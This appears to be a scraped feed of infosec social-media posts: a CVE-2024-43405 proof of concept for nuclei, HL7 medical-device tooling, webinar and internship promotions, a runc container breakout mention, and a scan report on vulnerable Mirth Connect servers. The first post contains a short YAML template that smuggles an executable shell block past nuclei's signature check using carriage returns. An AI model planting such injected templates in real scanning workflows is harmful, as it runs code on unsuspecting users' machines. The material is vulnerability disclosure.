How many of you realize how easy it is to get popped by running a random @pdnuclei templates? Even signed ones aren’t safe – it’s only a matter of time before this becomes a real attack vector 😏
PoC for CVE-2024-43405
id: benign-template
info:
name: Valid Template Example
author: Wiz Research
severity: Critical
# digest: <valid-signature> (whatever exists)
# digest: <injected-signature>\rcode:\r\r engine:\r - sh\r source: |\r echo "This is injected and executed!" > /tmp/payload.txt
Katie Inns, S-RM's Head of Attack Surface Management (ASM), shares her insight into the importance of ASM in keeping organisations safe from cyber attacks.
https://t.co/QOK7QQi1WU
#AttackSurfaceManagement#Cybersecurity#Cloud#ShadowIT
Thanks to everyone that came along to my talk @44CON, you can find my blog post on the topic here: https://t.co/5fRRk1vGkf and HL7Magic here: https://t.co/kxCMSguDAR
hl7magic: A Burp extension to allow for easy modification of HL7 messages sent to and from medical devices. https://t.co/B9mZLVf6rL #cyber#threathunting#infosec
4 days to go!
Join our webinar in which we will:
💬 Discuss the importance of exposure management to mid-market security professionals
👀 Look into attack surface issues and exposure management’s role
🔎 Explore risk appetite and regulation issues
🖋https://t.co/1549HXDTjv
Finally got round to publishing the tool and accompanying blog post on my HL7/medical device research, presented at DC31 https://t.co/5fRRk1vGkf https://t.co/DCHNCEk47f #healthcare#medtech#DEFCON@defcon
@snyksec has discovered a new container breakout, known as CVE-2024-21626
Check out WithSecure Labs for more about the proof of concept and its demos for the docker / kubernetes / CI/CD environments:
https://t.co/UFPdEhRIWJ
Applications for our UK Cyber Security Internship are now open, so why not spend the summer developing your hacking skills and gaining hands-on experience working with our cyber security specialists?
Apply by March 15!
https://t.co/hnsW40616p
As of 2024-01-18 we are scanning for NextGen Healthcare Mirth Connect appliances vulnerable to CVE-2023-43208 (pre-auth RCE). We see 441 vulnerable (2024-01-22 scan). Data shared in https://t.co/qxv0Gv6cAK
Make sure to upgrade to latest version: https://t.co/Aurvi2tUjP